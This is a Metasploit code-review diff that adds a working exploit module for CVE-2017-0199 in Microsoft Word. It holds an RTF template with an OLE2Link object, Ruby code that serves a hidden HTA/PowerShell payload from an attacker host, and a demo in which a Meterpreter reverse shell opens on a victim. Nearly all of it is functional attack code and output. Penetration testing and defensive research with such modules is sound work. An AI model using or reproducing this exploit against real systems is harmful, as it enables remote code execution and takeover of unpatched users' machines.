Land #8254, Add CVE-2017-0199 - Office Word HTA Module

data/exploits/cve-2017-0199.rtf

@@ -0,0 +1,33 @@
+{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe2052\themelang1033\themelangfe2052\themelangcs0
+{\info
+{\author Microsoft}
+{\operator Microsoft}
+}
+{\*\xmlnstbl {\xmlns1 http://schemas.microsoft.com/office/word/2003/wordml}}
+{
+{\object\objautlink\objupdate\rsltpict\objw291\objh230\objscalex99\objscaley101
+{\*\objclass Word.Document.8}
+{\*\objdata 0105000002000000
+090000004f4c45324c696e6b000000000000000000000a0000
+d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+fffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000704d
+6ca637b5d20103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000
+000000000000000000000000f00000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000
+0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000
+00000000000000000000000005000000b700000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
+MINISTREAM_DATA
+0105000000000000}
+{\result {\rtlch\fcs1 \af31507 \ltrch\fcs0 \insrsid1979324 }}}}
+{\*\datastore }
+}

documentation/modules/exploit/windows/fileformat/office_word_hta.md

@@ -0,0 +1,68 @@
+Microsoft Office is an office suite of applications, servers, and services developed by Microsoft. Microsoft Office contains Microsoft Word, Microsoft Excel, Microsoft PowerPoint and so on. They can support OLE data integration and Virtusl Basic for Application scripting langauage. 
+
+FireEye detected malicious Microsoft Office RTF documents that leverage a previously undisclosed vulnerability. This vulnerability allows a malicious actor to execute a Visual Basic script when the user opens a document containing an embedded exploit. FireEye has observed several Office documents exploiting the vulnerability that download and execute malware payloads from different well-known malware families.
+
+The attack involves a threat actor emailing a Microsoft Word document to a targeted user with an embedded OLE2link object. When the user opens the document, winword.exe issues a HTTP request to a remote server to retrieve a malicious .hta file, which appears as a fake RTF file. The Microsoft HTA application loads and executes the malicious script. In both observed documents the malicious script terminated the winword.exe process, downloaded additional payload(s), and loaded a decoy document for the user to see. The original winword.exe process is terminated in order to hide a user prompt generated by the OLE2link.
+
+
+## Vulnerable Application
+
+
+- Windows Vista Service Pack 2
+- Windows Vista x64 Edition Service Pack 2
+- Windows 7 for 32-bit Systems Service Pack 1
+- Windows 7 for x64-based Systems Service Pack 1
+- Windows Server 2008 for 32-bit Systems Service Pack 2
+- Windows Server 2008 R2 for x64-based Systems Service Pack 1
+- Windows Server 2008 for x64-based Systems Service Pack 2
+- Windows Server 2008 for Itanium-Based Systems Service Pack 2
+- Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
+- Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
+- Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
+- Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
+- Windows Server 2012
+- Windows Server 2012 (Server Core installation)
+- Microsoft Office 2007 Service Pack 3
+- Microsoft Office 2013 Service Pack 1 (32-bit editions)
+- Microsoft Office 2013 Service Pack 1 (64-bit editions)
+- Microsoft Office 2010 Service Pack 2 (32-bit editions)
+- Microsoft Office 2010 Service Pack 2 (64-bit editions)
+- Microsoft Office 2016 (32-bit edition)
+- Microsoft Office 2016 (64-bit edition)
+
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: ```use exploit/windows/fileformat/office_word_hta```
+3. Do: ```set payload [PAYLOAD NAME]```
+3. Do: ```exploit```
+
+## Demo
+
+```
+$ msfconsole
+msf > use exploit/windows/fileformat/office_word_hta 
+msf exploit(office_word_hta) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf exploit(office_word_hta) > set lhost 192.168.146.1
+lhost => 192.168.146.1
+msf exploit(office_word_hta) > set srvhost 192.168.146.1
+srvhost => 192.168.146.1
+msf exploit(office_word_hta) > run
+[*] Exploit running as background job.
+
+[*] Started reverse TCP handler on 192.168.146.1:4444 
+[+] msf.doc stored at /Users/wchen/.msf4/local/msf.doc
+[*] Using URL: http://192.168.146.1:8080/default.hta
+[*] Server started.
+```
+
+After you have the malicious doc file and servers ready, copy the doc file onto the victim machine,
+and open it with Microsoft Office Word. You should receive a session:
+
+```
+[*] Sending stage (957487 bytes) to 192.168.146.145
+[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.145:50165) at 2017-04-24 16:00:49 -0500
+```
+

modules/exploits/windows/fileformat/office_word_hta.rb

@@ -0,0 +1,159 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Remote::HttpServer::HTML
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => "Microsoft Office Word Malicious Hta Execution",
+      'Description'    => %q{
+        This module creates a malicious RTF file that when opened in
+        vulnerable versions of Microsoft Word will lead to code execution.
+        The flaw exists in how a olelink object can make a http(s) request,
+        and execute hta code in response.
+
+        This bug was originally seen being exploited in the wild starting
+        in Oct 2016. This module was created by reversing a public
+        malware sample.
+      },
+      'Author'         =>
+        [
+          'Haifei Li', # vulnerability analysis
+          'ryHanson',
+          'wdormann',
+          'DidierStevens',
+          'vysec',
+          'Nixawk', # module developer
+          'sinn3r'  # msf module improvement
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     => [
+        ['CVE', '2017-0199'],
+        ['URL', 'https://securingtomorrow.mcafee.com/mcafee-labs/critical-office-zero-day-attacks-detected-wild/'],
+        ['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/acknowledgement_ofa.html'],
+        ['URL', 'https://www.helpnetsecurity.com/2017/04/10/ms-office-zero-day/'],
+        ['URL', 'https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html'],
+        ['URL', 'https://www.checkpoint.com/defense/advisories/public/2017/cpai-2017-0251.html'],
+        ['URL', 'https://github.com/nccgroup/Cyber-Defence/blob/master/Technical%20Notes/Office%20zero-day%20(April%202017)/2017-04%20Office%20OLE2Link%20zero-day%20v0.4.pdf'],
+        ['URL', 'https://blog.nviso.be/2017/04/12/analysis-of-a-cve-2017-0199-malicious-rtf-document/'],
+        ['URL', 'https://www.hybrid-analysis.com/sample/ae48d23e39bf4619881b5c4dd2712b8fabd4f8bd6beb0ae167647995ba68100e?environmentId=100'],
+        ['URL', 'https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/'],
+        ['URL', 'https://www.microsoft.com/en-us/download/details.aspx?id=10725'],
+        ['URL', 'https://msdn.microsoft.com/en-us/library/dd942294.aspx'],
+        ['URL', 'https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-CFB/[MS-CFB].pdf'],
+        ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199']
+      ],
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Microsoft Office Word', {} ]
+        ],
+      'DefaultOptions' =>
+        {
+          'DisablePayloadHandler' => false
+        },
+      'DefaultTarget'  => 0,
+      'Privileged'     => false,
+      'DisclosureDate' => 'Apr 14 2017'))
+
+    register_options([
+      OptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']),
+      OptString.new('URIPATH',  [ true, 'The URI to use for the HTA file', 'default.hta'])
+    ], self.class)
+  end
+
+  def generate_uri
+    uri_maxlength = 112
+
+    host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
+    scheme = datastore['SSL'] ? 'https' : 'http'
+
+    uri = "#{scheme}://#{host}:#{datastore['SRVPORT']}#{'/' + Rex::FileUtils.normalize_unix_path(datastore['URIPATH'])}"
+    uri = Rex::Text.hexify(Rex::Text.to_unicode(uri))
+    uri.delete!("\n")
+    uri.delete!("\\x")
+    uri.delete!("\\")
+
+    padding_length = uri_maxlength * 2 - uri.length
+    fail_with(Failure::BadConfig, "please use a uri < #{uri_maxlength} bytes ") if padding_length.negative?
+    padding_length.times { uri << "0" }
+    uri
+  end
+
+  def create_ole_ministream_data
+    # require 'rex/ole'
+    # ole = Rex::OLE::Storage.new('cve-2017-0199.bin', Rex::OLE::STGM_READ)
+    # ministream = ole.instance_variable_get(:@ministream)
+    # ministream_data = ministream.instance_variable_get(:@data)
+
+    ministream_data = ""
+    ministream_data << "01000002090000000100000000000000" # 00000000: ................
+    ministream_data << "0000000000000000a4000000e0c9ea79" # 00000010: ...............y
+    ministream_data << "f9bace118c8200aa004ba90b8c000000" # 00000020: .........K......
+    ministream_data << generate_uri
+    ministream_data << "00000000795881f43b1d7f48af2c825d" # 000000a0: ....yX..;..H.,.]
+    ministream_data << "c485276300000000a5ab0000ffffffff" # 000000b0: ..'c............
+    ministream_data << "0609020000000000c000000000000046" # 000000c0: ...............F
+    ministream_data << "00000000ffffffff0000000000000000" # 000000d0: ................
+    ministream_data << "906660a637b5d2010000000000000000" # 000000e0: .f`.7...........
+    ministream_data << "00000000000000000000000000000000" # 000000f0: ................
+    ministream_data << "100203000d0000000000000000000000" # 00000100: ................
+    ministream_data << "00000000000000000000000000000000" # 00000110: ................
+    ministream_data << "00000000000000000000000000000000" # 00000120: ................
+    ministream_data << "00000000000000000000000000000000" # 00000130: ................
+    ministream_data << "00000000000000000000000000000000" # 00000140: ................
+    ministream_data << "00000000000000000000000000000000" # 00000150: ................
+    ministream_data << "00000000000000000000000000000000" # 00000160: ................
+    ministream_data << "00000000000000000000000000000000" # 00000170: ................
+    ministream_data << "00000000000000000000000000000000" # 00000180: ................
+    ministream_data << "00000000000000000000000000000000" # 00000190: ................
+    ministream_data << "00000000000000000000000000000000" # 000001a0: ................
+    ministream_data << "00000000000000000000000000000000" # 000001b0: ................
+    ministream_data << "00000000000000000000000000000000" # 000001c0: ................
+    ministream_data << "00000000000000000000000000000000" # 000001d0: ................
+    ministream_data << "00000000000000000000000000000000" # 000001e0: ................
+    ministream_data << "00000000000000000000000000000000" # 000001f0: ................
+    ministream_data
+  end
+
+  def create_rtf_format
+    template_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2017-0199.rtf")
+    template_rtf = ::File.open(template_path, 'rb')
+
+    data = template_rtf.read(template_rtf.stat.size)
+    data.gsub!('MINISTREAM_DATA', create_ole_ministream_data)
+    template_rtf.close
+    data
+  end
+
+  def on_request_uri(cli, req)
+    p = regenerate_payload(cli)
+    data = Msf::Util::EXE.to_executable_fmt(
+      framework,
+      ARCH_X86,
+      'win',
+      p.encoded,
+      'hta-psh',
+      { :arch => ARCH_X86, :platform => 'win' }
+    )
+
+    # This allows the HTA window to be invisible
+    data.sub!(/\n/, "\nwindow.moveTo -4000, -4000\n")
+
+    send_response(cli, data, 'Content-Type' => 'application/hta')
+  end
+
+  def exploit
+    file_create(create_rtf_format)
+    super
+  end
+end